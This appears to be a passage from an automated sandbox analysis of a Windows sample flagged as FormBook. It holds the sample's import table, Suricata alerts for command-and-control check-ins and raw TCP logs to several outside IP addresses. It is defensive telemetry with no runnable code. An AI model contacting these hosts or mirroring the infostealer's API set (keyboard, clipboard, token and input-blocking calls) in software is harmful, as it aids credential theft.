                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishGreat Britain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-09-05T14:24:29.528469+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549711199.59.243.22680TCP
                                                    2024-09-05T14:24:29.528469+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549711199.59.243.22680TCP
                                                    2024-09-05T14:24:45.410661+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55719272.52.178.2380TCP
                                                    2024-09-05T14:24:47.999882+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55719372.52.178.2380TCP
                                                    2024-09-05T14:24:50.562697+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55719472.52.178.2380TCP
                                                    2024-09-05T14:24:53.108803+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55719572.52.178.2380TCP
                                                    2024-09-05T14:24:53.108803+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55719572.52.178.2380TCP
                                                    2024-09-05T14:25:06.999734+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55719615.197.240.2080TCP
                                                    2024-09-05T14:25:09.543696+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55719715.197.240.2080TCP
                                                    2024-09-05T14:25:12.097318+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55719815.197.240.2080TCP
                                                    2024-09-05T14:25:12.097318+02002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.55719815.197.240.2080TCP
                                                    2024-09-05T14:25:14.634365+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55719915.197.240.2080TCP
                                                    2024-09-05T14:25:14.634365+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55719915.197.240.2080TCP
                                                    2024-09-05T14:25:28.483319+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557200199.59.243.22680TCP
                                                    2024-09-05T14:25:31.040913+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557201199.59.243.22680TCP
                                                    2024-09-05T14:25:33.548178+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557202199.59.243.22680TCP
                                                    2024-09-05T14:25:36.174460+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.557203199.59.243.22680TCP
                                                    2024-09-05T14:25:36.174460+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.557203199.59.243.22680TCP
                                                    2024-09-05T14:25:50.658954+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557204162.0.213.9480TCP
                                                    2024-09-05T14:25:53.204047+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557205162.0.213.9480TCP
                                                    2024-09-05T14:25:55.738624+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557206162.0.213.9480TCP
                                                    2024-09-05T14:25:58.268529+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.557207162.0.213.9480TCP
                                                    2024-09-05T14:25:58.268529+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.557207162.0.213.9480TCP
                                                    2024-09-05T14:26:04.426223+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55720813.248.151.23780TCP
                                                    2024-09-05T14:26:06.979323+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55720913.248.151.23780TCP
                                                    2024-09-05T14:26:09.504074+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55721013.248.151.23780TCP
                                                    2024-09-05T14:26:12.167470+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55721113.248.151.23780TCP
                                                    2024-09-05T14:26:12.167470+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55721113.248.151.23780TCP
                                                    2024-09-05T14:26:17.952179+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55721234.149.87.4580TCP
                                                    2024-09-05T14:26:20.494766+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55721334.149.87.4580TCP
                                                    2024-09-05T14:26:23.015896+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55721434.149.87.4580TCP
                                                    2024-09-05T14:26:25.546426+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55721534.149.87.4580TCP
                                                    2024-09-05T14:26:25.546426+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55721534.149.87.4580TCP
                                                    2024-09-05T14:26:31.226240+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55721691.203.110.24780TCP
                                                    2024-09-05T14:26:33.887796+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55721791.203.110.24780TCP
                                                    2024-09-05T14:26:36.447900+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55721891.203.110.24780TCP
                                                    2024-09-05T14:26:38.962807+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55721991.203.110.24780TCP
                                                    2024-09-05T14:26:38.962807+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55721991.203.110.24780TCP
                                                    2024-09-05T14:26:44.499385+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55722034.149.87.4580TCP
                                                    2024-09-05T14:26:47.030980+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55722134.149.87.4580TCP
                                                    2024-09-05T14:26:49.688095+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55722234.149.87.4580TCP
                                                    2024-09-05T14:26:52.280815+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55722334.149.87.4580TCP
                                                    2024-09-05T14:26:52.280815+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55722334.149.87.4580TCP
                                                    2024-09-05T14:26:57.961604+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55722472.52.178.2380TCP
                                                    2024-09-05T14:27:00.476532+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55722572.52.178.2380TCP
                                                    2024-09-05T14:27:03.017249+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55722672.52.178.2380TCP
                                                    2024-09-05T14:27:05.588486+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55722772.52.178.2380TCP
                                                    2024-09-05T14:27:05.588486+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55722772.52.178.2380TCP
                                                    2024-09-05T14:27:11.584928+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557228199.59.243.22680TCP
                                                    2024-09-05T14:27:14.189519+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557229199.59.243.22680TCP
                                                    2024-09-05T14:27:17.145172+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557230199.59.243.22680TCP
                                                    2024-09-05T14:27:19.681884+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.557231199.59.243.22680TCP
                                                    2024-09-05T14:27:19.681884+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.557231199.59.243.22680TCP
                                                    2024-09-05T14:27:33.552885+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557232199.59.243.22680TCP
                                                    2024-09-05T14:27:36.110585+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557233199.59.243.22680TCP
                                                    2024-09-05T14:27:38.652932+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.557234199.59.243.22680TCP
                                                    2024-09-05T14:27:41.175589+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.557235199.59.243.22680TCP
                                                    2024-09-05T14:27:41.175589+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.557235199.59.243.22680TCP
                                                    2024-09-05T14:27:49.709341+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.557236199.59.243.22680TCP
                                                    2024-09-05T14:27:49.709341+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.557236199.59.243.22680TCP
                                                    2024-09-05T14:27:55.252464+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55723772.52.178.2380TCP
                                                    2024-09-05T14:27:57.753496+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55723872.52.178.2380TCP
                                                    2024-09-05T14:28:00.299708+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55723972.52.178.2380TCP
                                                    2024-09-05T14:28:02.888098+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55724072.52.178.2380TCP
                                                    2024-09-05T14:28:02.888098+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55724072.52.178.2380TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 5, 2024 14:24:29.064208031 CEST4971180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:24:29.069044113 CEST8049711199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:24:29.069139004 CEST4971180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:24:29.071753025 CEST4971180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:24:29.076515913 CEST8049711199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:24:29.528198004 CEST8049711199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:24:29.528224945 CEST8049711199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:24:29.528234959 CEST8049711199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:24:29.528469086 CEST4971180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:24:29.531501055 CEST4971180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:24:29.536293983 CEST8049711199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:24:44.904761076 CEST5719280192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:44.910654068 CEST805719272.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:44.910773039 CEST5719280192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:44.953896999 CEST5719280192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:44.958887100 CEST805719272.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:45.410557985 CEST805719272.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:45.410660982 CEST5719280192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:46.466752052 CEST5719280192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:46.471510887 CEST805719272.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:47.497921944 CEST5719380192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:47.502938986 CEST805719372.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:47.503010035 CEST5719380192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:47.504967928 CEST5719380192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:47.509843111 CEST805719372.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:47.999830961 CEST805719372.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:47.999881983 CEST5719380192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:49.013710022 CEST5719380192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:49.161248922 CEST805719372.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:50.032345057 CEST5719480192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:50.037637949 CEST805719472.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:50.037724018 CEST5719480192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:50.040246010 CEST5719480192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:50.045209885 CEST805719472.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:50.045253992 CEST805719472.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:50.562625885 CEST805719472.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:50.562696934 CEST5719480192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:51.545056105 CEST5719480192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:51.549937010 CEST805719472.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:52.573510885 CEST5719580192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:52.578464031 CEST805719572.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:52.578538895 CEST5719580192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:52.589010954 CEST5719580192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:52.593981981 CEST805719572.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:53.108608961 CEST805719572.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:53.108623981 CEST805719572.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:24:53.108803034 CEST5719580192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:53.111604929 CEST5719580192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:24:53.116365910 CEST805719572.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:25:06.526961088 CEST5719680192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:06.532056093 CEST805719615.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:06.532140017 CEST5719680192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:06.534112930 CEST5719680192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:06.539037943 CEST805719615.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:06.999587059 CEST805719615.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:06.999733925 CEST5719680192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:08.045106888 CEST5719680192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:08.050071001 CEST805719615.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:09.063730955 CEST5719780192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:09.068886995 CEST805719715.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:09.069005966 CEST5719780192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:09.070902109 CEST5719780192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:09.075870037 CEST805719715.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:09.543602943 CEST805719715.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:09.543695927 CEST5719780192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:10.576246977 CEST5719780192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:10.581185102 CEST805719715.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:11.615734100 CEST5719880192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:11.620688915 CEST805719815.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:11.623385906 CEST5719880192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:11.625915051 CEST5719880192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:11.631323099 CEST805719815.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:11.631351948 CEST805719815.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:12.097202063 CEST805719815.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:12.097317934 CEST5719880192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:13.138637066 CEST5719880192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:13.143491983 CEST805719815.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:14.157593012 CEST5719980192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:14.162842035 CEST805719915.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:14.162941933 CEST5719980192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:14.164923906 CEST5719980192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:14.169809103 CEST805719915.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:14.632872105 CEST805719915.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:14.634314060 CEST805719915.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:14.634365082 CEST5719980192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:14.655082941 CEST5719980192.168.2.515.197.240.20
                                                    Sep 5, 2024 14:25:14.659853935 CEST805719915.197.240.20192.168.2.5
                                                    Sep 5, 2024 14:25:28.018397093 CEST5720080192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:28.023317099 CEST8057200199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:28.024056911 CEST5720080192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:28.027965069 CEST5720080192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:28.032761097 CEST8057200199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:28.483258009 CEST8057200199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:28.483275890 CEST8057200199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:28.483288050 CEST8057200199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:28.483319044 CEST5720080192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:28.483366966 CEST5720080192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:29.529963970 CEST5720080192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:30.548536062 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:30.553543091 CEST8057201199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:30.553617954 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:30.555933952 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:30.561006069 CEST8057201199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:31.040836096 CEST8057201199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:31.040862083 CEST8057201199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:31.040913105 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:31.040998936 CEST8057201199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:31.041050911 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:32.060965061 CEST5720180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.080302000 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.085149050 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.085220098 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.087347031 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.094484091 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.094616890 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.547557116 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.547616959 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.548177958 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:33.548604965 CEST8057202199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:33.552040100 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:34.592761993 CEST5720280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:35.610971928 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:35.615870953 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:35.620066881 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:35.622976065 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:35.627777100 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174249887 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174282074 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174294949 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174365997 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:36.174459934 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:36.174459934 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:36.177076101 CEST5720380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:25:36.181855917 CEST8057203199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:25:50.050396919 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.055306911 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.058168888 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.058168888 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.064186096 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658869028 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658911943 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658925056 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658937931 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658951044 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.658953905 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.658989906 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.659126997 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659152985 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659162998 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.659163952 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659193993 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.659312963 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659326077 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.659379005 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.664133072 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.664146900 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.664159060 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.664205074 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:50.747368097 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.747387886 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.747410059 CEST8057204162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:50.747471094 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:51.560691118 CEST5720480192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:52.593292952 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:52.598450899 CEST8057205162.0.213.94192.168.2.5
                                                    Sep 5, 2024 14:25:52.598525047 CEST5720580192.168.2.5162.0.213.94
                                                    Sep 5, 2024 14:25:52.601150990 CEST5720580192.168.2.5162.0.213.94
